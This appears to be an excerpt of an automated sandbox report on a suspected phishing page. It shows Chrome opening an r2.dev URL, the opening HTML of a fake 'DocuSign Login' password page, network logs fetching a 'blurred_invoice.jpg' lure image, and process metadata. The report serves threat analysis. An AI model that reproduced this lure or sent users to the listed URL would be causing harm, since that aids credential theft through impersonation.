                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 07:22:53 GMT
                      Server: cloudflare
                      CF-RAY: 9021ce763bbbde9a-EWR
                      2025-01-15 00:39:03 UTC | 1085 | IN
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49745 | 95.154.228.177 | 443 | 3104 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:39:04 UTC | 635 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:05 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:39:05 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:39:05 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:39:05 UTC | 7494 | IN
                      Data Ascii: JFIF, CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49749 | 95.154.228.177 | 443 | 3104 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:39:06 UTC | 435 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:06 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:39:06 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:39:06 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:39:06 UTC | 7494 | IN
                      Data Ascii: JFIF, CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80


                      Target ID:0
                      Start time:19:38:52
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:19:38:55
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:19:39:01
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly